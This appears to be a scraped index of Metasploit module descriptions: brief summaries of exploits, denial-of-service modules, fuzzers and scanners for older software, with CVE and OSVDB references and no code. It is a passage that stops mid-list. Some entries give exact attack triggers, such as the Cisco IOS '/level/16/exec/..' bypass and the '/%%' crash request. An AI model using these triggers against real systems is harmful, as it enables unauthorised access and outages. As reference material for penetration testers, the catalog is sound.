Metasploit Penetration Testing Framework
Veritas Backup Exec Windows Remote File Access
This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash.
OSVDB-18695
BID-14551
http://www.fpns.net/willy/msb...
Veritas Backup Exec Server Registry Access
This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based on the NDR stub information information posted to openrce.org. Please see the action list for the different attack modes.
OSVDB-17627
CVE-2005-0771
http://www.idefense.com/appli...
Cisco IOS HTTP Unauthorized Administrative Access
This module exploits a vulnerability in the Cisco IOS HTTP Server. By sending a GET request for "/level/num/exec/..", where num is between 16 and 99, it is possible to bypass authentication and obtain full system control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d).
BID-2936
CVE-2001-0537
http://www.cisco.com/warp/pub...
OSVDB-578
Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
This module tests for a logic vulnerability in the Cisco VPN Concentrator 3000 series. It is possible to execute some FTP statements without authentication (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs when working with CWD commands. This module simply creates an arbitrary directory, verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug.
BID-19680
CVE-2006-4313
http://www.cisco.com/warp/pub...
OSVDB-28139
OSVDB-28138
IBM DB2 db2rcmd.exe Command Execution Vulnerability.
This module exploits a vulnerability in the Remote Command Server component in IBM's DB2 Universal Database 8.1. An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe which could lead to administrator privileges.
CVE-2004-0795
OSVDB-4180
BID-9821
Novell eDirectory DHOST Predictable Session Cookie
This module is able to predict the next session cookie value issued by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run this module, wait until the real administrator logs in, then specify the predicted cookie value to hijack their session.
OSVDB-60035
EMC AlphaStor Device Manager Arbitrary Command Execution
EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.
http://labs.idefense.com/inte...
OSVDB-45715
CVE-2008-2157
BID-29398
EMC AlphaStor Library Manager Arbitrary Command Execution
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.
http://labs.idefense.com/inte...
CVE-2008-2157
OSVDB-45715
BID-29398
Titan FTP XCRC Directory Traversal Information Disclosure
This module exploits a directory traversal vulnreability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC "brute force" attack. Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory.
OSVDB-65533
http://seclists.org/bugtraq/2...
HP Web JetAdmin 6.5 Server Arbitrary Command Execution
This module abuses a command execution vulnerability within the web based management console of the Hewlett-Packard Web JetAdmin network printer tool v6.2 - v6.5. It is possible to execute commands as SYSTEM without authentication. The vulnerability also affects POSIX systems, however at this stage the module only works against Windows. This module does not apply to HP printers.
OSVDB-5798
BID-10224
http://www.milw0rm.com/exploi...
Iomega StorCenter Pro NAS Web Authentication Bypass
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs, allowing for simple brute force attacks to bypass authentication and gain administrative access.
OSVDB-55586
CVE-2009-2367
Tomcat Administration Tool Default Access
Detect the Tomcat administration interface.
http://tomcat.apache.org/
Typo3 sa-2009-002 File Disclosure
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.
OSVDB-52048
CVE-2009-0815
http://secunia.com/advisories...
http://www.milw0rm.com/exploi...
http://typo3.org/teams/securi...
SAP MaxDB cons.exe Remote Command Injection
SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.
OSVDB-40210
BID-27206
CVE-2008-0244
Motorola WR850G v4.03 Credentials
Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in.
CVE-2004-1550
OSVDB-10232
http://seclists.org/bugtraq/2...
Microsoft Host Integration Server 2006 Command Execution Vulnerability.
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
MSB-MS08-059
CVE-2008-3466
OSVDB-49068
http://labs.idefense.com/inte...
Microsoft SQL Server Configuration Enumerator
This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.
Microsoft SQL Server xp_cmdshell Command Execution
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module
http://msdn.microsoft.com/en-...
Microsoft SQL Server - Interesting Data Finder
This module will search the specified MSSQL server for 'interesting' columns and data. The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. The module will not work against SQL Server 2000 at this time, if you are interested in supporting this platform, please contact the author.
http://www.digininja.org/meta...
Microsoft SQL Server Generic Query
This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropiate credentials.
www.attackresearch.com
http://msdn.microsoft.com/en-...
MySQL Enumeration Module
This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.
https://cisecurity.org/benchm...
MySQL SQL Generic Query
This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.
TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
This module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM via dot dot sequences in an HTTP request.
OSVDB-48730
CVE-2008-2439
BID-31531
http://www.trendmicro.com/ftp...
SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_CHANGE_SOURCE.
This module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2008-3996
http://www.oracle.com/technol...
SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE.
This module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2008-3995
http://www.oracle.com/technol...
SQL Injection in SYS.LT.COMPRESSWORKSPACETREE Procedure.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in SYS.LT.COMPRESSWORKSPACETREE procedure. Tested on Oracle 10g R1.
CVE-2008-3982
http://www.appsecinc.com/reso...
SQL Injection in SYS.LT.MERGEWORKSPACE Procedure.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in SYS.LT.MERGEWORKSPACE procedure.
CVE-2008-3983
http://www.appsecinc.com/reso...
SQL Injection in SYS.LT.REMOVEWORKSPACE Procedure.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in SYS.LT.REMOVEWORKSPACE procedure.
CVE-2008-3984
http://www.appsecinc.com/reso...
Oracle SMB Relay Code Execution
This module will help you to get Administrator access to OS using an unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges). To do this you must firstly run smb_sniffer or smb_relay module on your sever. Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. So if smb_relay is working, you will get Administrator access to server which runs Oracle. If not than you can decrypt HALFLM hash.
http://dsecrg.com/pages/pub/s...
Oracle Account Discovery.
This module uses a list of well known default authentication credentials to discover easily guessed accounts.
http://www.petefinnigan.com/d...
http://seclists.org/fulldiscl...
Oracle SQL Generic Query
This module allows for simple SQL statements to be executed against a Oracle instance given the appropriate credentials and sid.
https://www.metasploit.com/us...
Oracle Database Enumeration
This module provides a simple way to scan an Oracle database server for configuration parameters that may be useful during a penetration test. Valid database credentials must be provided for this module to run.
Oracle Secure Backup exec_qr() Command Injection Vulnerability
This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
CVE-2008-5448
OSVDB-51342
http://www.oracle.com/technol...
http://www.zerodayinitiative....
Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).
CVE-2009-1977
OSVDB-55903
CVE-2009-1978
OSVDB-55904
http://www.zerodayinitiative....
http://www.zerodayinitiative....
Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).
CVE-2010-0904
OSVDB-66338
http://www.zerodayinitiative....
Oracle Java execCommand (Win32)
This module will create a java class which enables the execution of OS commands.
https://www.metasploit.com/us...
Oracle URL Download
This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.
http://www.argeniss.com/resea...
ORACLE SID Brute Forcer.
This module simply attempts to discover the protected SID.
https://www.metasploit.com/us...
http://www.red-database-secur...
TNSLsnr Command Issuer
This module allows for the sending of arbitrary TNS commands in order to gather information. Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd
UoW pop2d Remote File Retrieval Vulnerability
This module exploits a vulnerability in the FOLD command of the University of Washington ipop2d service. By specifying an arbitrary folder name it is possible to retrieve any file which is world or group readable by the user ID of the POP account. This vulnerability can only be exploited with a valid username and password. The From address is the file owner.
OSVDB-368
BID-1484
PostgreSQL Server Generic Query
This module imports a file local on the PostgreSQL Server into a temporary table, reads it, and then drops the temporary table. It requires PostgreSQL credentials with table CREATE privileges as well as read privileges to the target file.
http://michaeldaw.org/sql-inj...
PostgreSQL Server Generic Query
This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropiate credentials.
www.postgresql.org
TrendMicro ServerProtect File Access
This modules exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information.
CVE-2007-6507
OSVDB-44318
http://www.zerodayinitiative....
Samba Symlink Directory Traversal
This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem.
OSVDB-62145
http://www.samba.org/samba/ne...
Solaris KCMS + TTDB Arbitrary File Read
This module targets a directory traversal vulnerability in the kcms_server component from the Kodak Color Management System. By utilizing the ToolTalk Database Server\'s TT_ISBUILD procedure, an attacker can bypass existing directory traversal validation and read arbitrary files. Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both kcms_server and rpc.ttdbserverd must be running on the target host.
CVE-2003-0027
OSVDB-8201
BID-6665
http://marc.info/?l=bugtraq&m...
http://sunsolve.sun.com/searc...
Symantec System Center Alert Management System Arbitrary Command Execution
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.
CVE-2009-1429
BID-34671
OSVDB-54157
http://www.zerodayinitiative....
http://www.symantec.com/busin...
TikiWiki information disclosure
A vulnerability has been reported in Tikiwiki, which can be exploited by a anonymous user to dump the MySQL user & passwd just by creating a mysql error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5.
OSVDB-30172
BID-20858
CVE-2006-5702
http://secunia.com/advisories...
Webmin file disclosure
A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).
OSVDB-26772
BID-18744
CVE-2006-3392
US-CERT-VU-999601
http://secunia.com/advisories...
Generic Emailer (SMTP)
This module can be used to automate email delivery. This code is based on Joshua Abraham's email script for social engineering.
http://spl0it.org/
Cisco IOS HTTP GET /%% request Denial of Service
This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for "/%%", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
BID-1154
CVE-2000-0380
http://www.cisco.com/warp/pub...
OSVDB-1302
FreeBSD Remote NFS RPC Request Denial of Service
This module sends a specially-crafted NFS Mount request causing a kernel panic on host running FreeBSD 6.0.
http://lists.immunitysec.com/...
BID-16838
OSVDB-23511
CVE-2006-0900
3Com SuperStack Switch Denial of Service
This module causes a temporary denial of service condition against 3Com SuperStack switches. By sending excessive data to the HTTP Management interface, the switch stops responding temporarily. The device does not reset. Tested successfully against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72.
OSVDB-7246
CVE-2004-2691
http://support.3com.com/infod...
Apache mod_isapi <= 2.2.14 Dangling Pointer
This module triggers a use-after-free vulnerability in the Apache Software Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code execution. Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, a second ISAPI module was loaded into the same memory area as the previously unloaded module.
CVE-2010-0425
BID-38494
https://issues.apache.org/bug...
http://www.gossamer-threads.c...
http://www.senseofsecurity.co...
http://www.exploit-db.com/exp...
Dell OpenManage POST Request Heap Overflow (win32)
This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. This module will crash the web server, however it is likely exploitable under certain conditions.
http://archives.neohapsis.com...
BID-9750
OSVDB-4077
CVE-2004-0331
Ruby WEBrick::HTTP::DefaultFileHandler DoS
The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423 allows for a DoS (CPU consumption) via a crafted HTTP request.
BID-30644
CVE-2008-3656
OSVDB-47471
http://www.ruby-lang.org/en/n...
Avahi < 0.6.24 Source Port 0 DoS
Avahi-daemon versions prior to 0.6.24 can be DoS'd with an mDNS packet with a source port of 0
CVE-2008-5081
OSVDB-50929
NTP.org ntpd Reserved Mode Denial of Service
This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!
BID-37255
CVE-2009-3563
OSVDB-60847
https://support.ntp.org/bugs/...
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
This module exploits a kernel based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS.
BID-5807
CVE-2002-1214
OSVDB-13422
MSB-MS02-063
Samba lsa_io_privilege_set Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon.
CVE-2007-2446
OSVDB-34699
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon.
CVE-2007-2446
OSVDB-34699
Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution.
OSVDB-2577
CVE-2003-0694
BID-8641
http://www.milw0rm.com/exploi...
Solaris LPD Arbitrary File Delete
This module uses a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system. This can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
CVE-2005-4797
BID-14510
OSVDB-18650
http://sunsolve.sun.com/searc...
Juniper JunOS Malformed TCP Option
This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.
BID-37670
OSVDB-61538
http://praetorianprefect.com/...
TCP SYN Flooder
A simple TCP SYN flooder
Wireless CTS/RTS Flooder
This module sends 802.11 CTS/RTS requests to a specific wireless peer, using the specified source address,
Apple Airport 802.11 Probe Response Kernel Memory Corruption
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received that does not contain valid information element (IE) fields after the fixed-length header. The data following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values.
CVE-2006-5710
OSVDB-30180
Wireless DEAUTH Flooder
This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID.
Wireless Fake Access Point Beacon Flood
This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool.
Wireless Frame (File) Injector
Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module *does* take into account the ToDS and FromDS flags in the frame when replacing any specified addresses.
NetGear MA521 Wireless Driver Long Rates Overflow
This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-6059
OSVDB-30507
http://projects.info-pull.com...
ftp://downloads.netgear.com/f...
NetGear WG311v1 Wireless Driver Long SSID Overflow
This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-6125
OSVDB-30511
http://projects.info-pull.com...
ftp://downloads.netgear.com/f...
Multiple Wireless Vendor NULL SSID Probe Response
This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards).
http://802.11ninja.net/papers...
WVE-2006-0064
Wireless Test Module
This module is a test of the wireless packet injection system. Please see external/ruby-lorcon/README for more information.
Appian Enterprise Business Suite 5.6 SP1 DoS
This module exploits a denial of service flaw in the Appian Enterprise Business Suite service.
CVE-2007-6509
OSVDB-39500
http://archives.neohapsis.com...
Microsoft Windows EOT Font Table Directory Integer Overflow
This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer.
CVE-2009-2514
MSB-MS09-065
OSVDB-59869
FileZilla FTP Server Admin Interface Denial of Service
This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. By sending a procession of excessively long USER commands to the FTP Server, the Administration Interface (FileZilla Server Interface.exe) when running, will overwrite the stack with our string and generate an exception. The FileZilla FTP Server itself will continue functioning.
BID-15346
CVE-2005-3589
http://www.milw0rm.com/exploi...
OSVDB-20817
FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service
This module triggers a Denial of Service condition in the FileZilla FTP Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer.
BID-21542
BID-21549
CVE-2006-6565
http://www.milw0rm.com/exploi...
OSVDB-34435
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST.
CVE-2008-4572
OSVDB-49045
http://milw0rm.com/exploits/6738
Titan FTP Server 6.26.630 SITE WHO DoS
The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE WHO". You need a valid login so you can send this command.
CVE-2008-6082
OSVDB-49177
http://milw0rm.com/exploits/6753
Victory FTP Server 5.0 LIST DoS
The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command
CVE-2008-2031
CVE-2008-6829
OSVDB-44608
http://milw0rm.com/exploits/6834
WinFTP 2.3.0 NLST Denial of Service
This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.
CVE-2008-5666
OSVDB-49043
http://milw0rm.com/exploits/6581
XM Easy Personal FTP Server 5.6.0 NLST DoS
This module is a port of shinnai's script. You need a valid login, but even anonymous can do it as long as it has permission to call NLST.
CVE-2008-5626
OSVDB-50837
http://milw0rm.com/exploits/6741
XM Easy Personal FTP Server 5.7.0 NLST DoS
You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.
CVE-2008-5626
OSVDB-50837
http://milw0rm.com/exploits/8294
Pi3Web <=2.0.13 ISAPI DoS
The Pi3Web HTTP server crashes when a request is made for an invalid DLL file in /isapi. By default, the non-DLLs in this directory after installation are users.txt, install.daf and readme.daf.
CVE-2008-6938
OSVDB-49998
http://milw0rm.com/exploits/7109
Microsoft Windows NAT Helper Denial of Service
This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP.
OSVDB-30096
BID-20804
CVE-2006-5614
Microsoft Plug and Play Service Registry Overflow
This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C.
CVE-2005-2120
MSB-MS05-047
BID-15065
OSVDB-18830
Microsoft SRV.SYS Mailslot Write Corruption
This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1).
BID-19215
OSVDB-27644
CVE-2006-3942
http://www.coresecurity.com/c...
MSB-MS06-035
Microsoft SRV.SYS Pipe Transaction No Null
This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS.
OSVDB-27644
MSB-MS06-063
CVE-2006-3942
BID-19215
Microsoft SRV.SYS WriteAndX Invalid DataOffset
This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. This module has been tested successfully against Windows Vista.
MSB-MS09-001
OSVDB-48153
CVE-2008-4114
BID-31179
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
CVE-2009-3103
BID-36299
OSVDB-57799
MSB-MS09-050
http://seclists.org/fulldiscl...
http://www.microsoft.com/tech...
Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
CVE-2009-3103
OSVDB-57799
MSB-MS09-050
Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerabile client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise.
CVE-2010-0017
OSVDB-62244
MSB-MS10-006
http://g-laurent.blogspot.com...
Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
This module triggers a NULL dereference in svchost.exe on all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP SP1 (using the SRVSVC pipe).
OSVDB-64340
Microsoft Vista SP0 SMB Negotiate Protocol DoS
This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. This vulnerability was silently fixed in Microsoft Vista Service Pack 1.
OSVDB-64341
MS06-019 Exchange MODPROP Heap Overflow
This module triggers a heap overflow vulnerability in MS Exchange that occurs when multiple malformed MODPROP values occur in a VCAL request.
BID-17908
CVE-2006-0027
MSB-MS06-019
PacketTrap TFTP Server 2.2.5459.0 DoS
The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request.
CVE-2008-1311
OSVDB-42932
http://milw0rm.com/exploits/6863
SolarWinds TFTP Server 10.4.0.10 Denial of Service
The SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name.
CVE-2010-2115
OSVDB-64845
http://www.exploit-db.com/exp...
Wireshark chunked_encoding_dissector function DOS
Wireshark crash when dissecting an HTTP chunked response. Versions affected: 0.99.5 (Bug 1394)
CVE-2007-3389
OSVDB-37643
https://bugs.wireshark.org/bu...
Wireshark LDAP dissector DOS
The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet.
CVE-2008-1562
OSVDB-43840
Simple FTP Fuzzer
This module will connect to a FTP server and perform pre- and post-authentication fuzzing
HTTP GET Request URI Fuzzer (Incrementing Lengths)
This module sends a series of HTTP GET request with incrementing URL lengths.
HTTP GET Request URI Fuzzer (Fuzzer Strings)
This module sends a series of HTTP GET request with malicious URIs.
SMB Negotiate SMB2 Dialect Corruption
This module sends a series of SMB negiotiate requests that advertise a SMB2 dialect with corrupted bytes.
SMB Create Pipe Request Fuzzer
This module sends a series of SMB create pipe requests using malicious strings.
SMB Create Pipe Request Corruption
This module sends a series of SMB create pipe requests with corrupted bytes.
SMB Negotiate Dialect Corruption
This module sends a series of SMB negiotiate requests with corrupted bytes
SMB NTLMv1 Login Request Corruption
This module sends a series of SMB login requests using the NTLMv1 protocol with corrupted bytes.
SMB Tree Connect Request Fuzzer
This module sends a series of SMB tree connect requests using malicious strings.
SMB Tree Connect Request Corruption
This module sends a series of SMB tree connect requests with corrupted bytes.
SMTP Simple Fuzzer
SMTP Simple Fuzzer
http://www.ietf.org/rfc/rfc28...
SSH Key Exchange Init Corruption
This module sends a series of SSH requests with a corrupted initial key exchange payload.
SSH 1.5 Version Fuzzer
This module sends a series of SSH requests with malicious version strings.
SSH 2.0 Version Fuzzer
This module sends a series of SSH requests with malicious version strings.
SSH Version Corruption
This module sends a series of SSH requests with a corrupted version string
TDS Protocol Login Request Corruption Fuzzer
This module sends a series of malformed TDS login requests.
TDS Protocol Login Request Username Fuzzer
This module sends a series of malformed TDS login requests.
Wireless Beacon Frame Fuzzer
This module sends out corrupted beacon frames.
Wireless Probe Response Frame Fuzzer
This module sends out corrupted probe response frames.
Citrix MetaFrame ICA Published Applications Scanner
This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications.
http://www.securiteam.com/exp...
Citrix MetaFrame ICA Published Applications Bruteforcer
This module attempts to brute force program names within the Citrix Metaframe ICA server.
OSVDB-50617
BID-5817
http://sh0dan.org/oldfiles/ha...
DNS Enumeration Module
This module can be used to enumerate various types of information about a domain from a specific DNS server.
CVE-1999-0532
OSVDB-492
Search Engine Domain Email Address Collector
This module uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.
Foxit Reader Authorization Bypass
This module exploits a authorization bypass vulnerability in Foxit Reader build 1120. When a attacker creates a specially crafted pdf file containing a Open/Execute action, arbitrary commands can be executed without confirmation from the victim.
CVE-2009-0836
OSVDB-55615
BID-34035
Energizer DUO Trojan Scanner
Detect instances of the Energizer DUO trojan horse software on port 7777
CVE-2010-0103
OSVDB-62782
US-CERT-VU-154421
DB2 Authentication Brute Force Utility
This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
DB2 Probe Utility
This module queries a DB2 instance information.
DB2 Discovery Service Detection.
This module simply queries the DB2 discovery service for information.
Endpoint Mapper Service Discovery
This module can be used to obtain information from the Endpoint Mapper service.
Hidden DCERPC Service Discovery
This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted.
Remote Management Interface Discovery
This module can be used to obtain information from the Remote Management Interface DCERPC service.
DCERPC TCP Service Auditor
Determine what DCERPC services are accessible over a TCP port
DECT Call Scanner
This module scans for active DECT calls
Dedected-http://www.dedected.org
DECT Base Station Scanner
This module scans for DECT base stations
Dedected-http://www.dedected.org
ARP Sweep Local Network Discovery
Enumerate alive Hosts in local network using ARP requests.
UDP Service Prober
Detect common UDP services using sequential probes
UDP Service Sweeper
Detect common UDP services
EMC AlphaStor Device Manager Service.
This module querys the remote host for the EMC Alphastor Device Management Service.
EMC AlphaStor Library Manager Service.
